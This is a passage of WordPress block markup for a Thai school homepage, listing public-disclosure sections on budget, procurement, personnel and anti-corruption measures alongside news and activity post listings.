{\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 